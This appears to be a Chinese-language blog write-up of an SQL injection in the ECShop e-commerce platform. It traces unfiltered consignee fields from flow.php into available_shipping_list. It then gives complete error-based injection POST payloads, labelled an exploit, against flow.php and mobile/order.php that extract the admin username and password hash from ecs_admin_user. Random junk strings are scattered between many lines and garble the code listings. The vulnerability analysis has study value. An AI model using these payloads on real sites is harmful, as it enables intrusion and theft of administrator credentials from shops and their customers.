ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。

    漏洞关键文件：

    /includes/lib_order.php
: x6 Y# ]7 I" p- v9 ?
  h! m. x4 X, r; a6 Y2 |& K  e    关键函数：

; n) I  U, E) f9 |3 P5 ]

01     function available_shipping_list($region_id_list)
" d  z3 z5 z# o* B
02 {

6 r& s1 ^: v7 T! Z5 B) \: c! [03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .

04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

; q( K0 J9 W1 B( y- m& j07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
% l4 Y+ y6 P- q& v4 f% e; @
08             'WHERE r.region_id ' . db_create_in($region_id_list) .

09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
4 c, h  a6 s' {9 L
: M# ~( g3 |+ g( T3 Z, W/ p10   
( L, n/ F/ {9 T' ?6 @
11     return $GLOBALS['db']->getAll($sql);
0 n! Z' r+ m! J- {$ b, n! `4 X6 {" l7 \
12 }

显然对传入的参数没有任何过滤就带入了查询语句。
: N4 E! t+ M7 `  R
下面我们追踪这个函数在flow.php中：
第531行：   
4 \3 x$ E; x; J! H: a
3 k8 ?; K' Z/ L* O4 x6 A7 v1 $shipping_list     = available_shipping_list($region);

2 G. d; F  K* C  p  v


4 i5 h9 {4 M( F5 c' o. R  k, I
! g! t+ N; ^1 o  N再对传入变量进行追踪：

第530行：   

1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);





第473行：        
7 ?' h3 n" v/ ^1 Z4 q0 j& e
1 $consignee = get_consignee($_SESSION['user_id']);
  p: B8 G7 }1 Y. ]/ f
到了一个关键函数：

, A& G) O2 S; F5 u- S/includes/lib_order.php
; G' v8 c) o- M6 ?! p
0 z0 Z: Z+ S9 K' N0 _

+ ^7 D7 [1 d! L7 @# f5 f
5 n& _# V2 N4 c# Z# v$ O8 S1 Z
( E; n9 i; C+ {; X01 function get_consignee($user_id)
# L/ F, M# R- C
02 {
0 o3 G6 D& e$ b# y
03     if (isset($_SESSION['flow_consignee']))

- U2 R/ U0 c+ d04     {

05         /* 如果存在session，则直接返回session中的收货人信息 */

% T8 c! b1 `: X' }' E2 N, P06   

07         return $_SESSION['flow_consignee'];
& }7 |" ?4 z4 r% m: g4 I
) E- K3 l, n! v% }/ A08     }

09     else

10     {

; ]5 _" j; [- }$ t11         /* 如果不存在，则取得用户的默认收货人信息 */

, ^) ?" z) P: s  s12         $arr = array();

5 n6 F8 F* p% _13   

6 ?( o- V- u9 p1 X) H14         if ($user_id > 0)

15         {
0 H' ^, W6 S+ ]; i2 P
16             /* 取默认地址 */

17             $sql = "SELECT ua.*".
  f9 z  t+ _7 q( y
5 j1 I9 {- X6 ?/ M6 v18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
- t7 w# ]$ _: Z! m7 X
4 F, {+ O% c; D$ s19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
' _% A3 v4 d4 l' z: R
9 ^4 C7 H4 T1 R! E% L20   

21             $arr = $GLOBALS['db']->getRow($sql);

22         }
( g' t2 \" T. o
23   
9 Q  |9 G/ [& ~: r# |- B# a
24         return $arr;
5 k, G6 H. W) C" `
25     }
1 N6 v) C" ~* f0 ?1 U6 c
7 d; |& B5 J& B: J$ w9 N9 T0 c1 Q26 }
9 c9 [* G  d0 w3 ?+ C2 ~/ q
5 Q( a0 s0 Z  s+ G# W# K. x显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？
1 p5 v6 h8 V/ |9 v- _( K


关键点:
5 t; i& k4 F, }8 v
第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

' D( W# h! t- u; Q$ o这里对传入参数反转义存入$_SESSION中。
; l! @/ [( H6 o- M3 y* j1 t/ k


+ U0 a9 C% \: L  {- K然后看下：



   

01 $consignee = array(

: g9 m6 B% `- n2 `+ f, o, m3 X02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),

  i' P. w: I7 p03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),
8 G' R$ H% w3 ^) \; G) I) J, ^
04         'country'       => empty($_POST['country'])    ? '' _POST['country'],

- N+ u* t9 @% r3 t% Z" Y7 e+ @05         'province'      => empty($_POST['province'])   ? '' _POST['province'],
' V( C! g( t4 C+ B, l+ U' n5 S
06         'city'          => empty($_POST['city'])       ? '' _POST['city'],
! @3 b. Z; P) |' V$ C% J  ?9 x
07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
; v( N  f5 z# `3 O
- o  h* ]1 M. t: l! U0 J08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

09         'address'       => empty($_POST['address'])    ? '' _POST['address'],

) F  \: j& v6 }/ H& P- _  K10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
: h( e" i* f$ U$ ]. K5 R
11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
8 `" r1 m6 y" ?2 ~* Y# m
. m4 r' A3 Y2 N+ Y0 u12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
( s0 I" U0 @5 N, A8 a
6 H) |% y0 l' J% Y14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],
4 \5 S6 o3 E; v/ j& W7 p
15     );

9 z1 S9 G+ q  |5 ?1 t4 c好了注入就这样出现了。
/ g6 }, X/ S( P0 ~
==================
+ z/ i) M( z" i+ Y$ W6 F! K
" M* R) f& O% Y, e* v- \注入测试：

% W: {' k" c9 t! o7 T0 c& w环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
. w* j0 |! x5 r: i, j& V9 o. V; P3 Z
/ s9 s) v9 B2 `测试程序：ECShop_V2.7.3_UTF8_release1106
" l! z& W* T0 k" h6 |) b. L7 h$ l


1.首先需要点击一个商品加入购物车
. o0 g6 b/ Y7 {/ y$ B6 O* m
2.注册一个会员帐号
& h& y4 k* N, E! n, w. c
3.post提交数据
# C/ z! \% L5 G6 M& ?) i
4 S' s, h# F7 N

3 n# J7 c5 {+ ~- {9 H5 v8 A1 http://127.0.0.1/ecshop/flow.php
+ L6 P7 {( [( G9 I2 b
6 o0 Q6 Y( }4 p7 L6 ~7 {2   

7 ~: W! a* {2 g* X& O3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
举一反三，我们根据这个漏洞我们可以继续深入挖掘：

* b. C# }( M2 i- G我们搜寻关键函数function available_shipping_list()

. [) o  _/ l, s/ t. v在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同
0 F8 L7 A' I1 }# H2 ^
; m1 e5 V* Q. d; o* g$ V利用exp:

+ e0 H7 G6 [) m! Z- @& g" }+ F1.点击一个商品，点击购买商标
" j2 \0 D- v8 D; V: r6 U+ {
7 _4 c# @* D  v" n2.登录会员帐号

3.post提交：
; |( }4 s0 Q! T& h4 s
+ `0 W* l' i: r6 _$ Qhttp://127.0.0.1/ecshop/mobile/order.php
9 Z3 a' U' _1 {8 j


, \* a2 o! a, O* bcountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=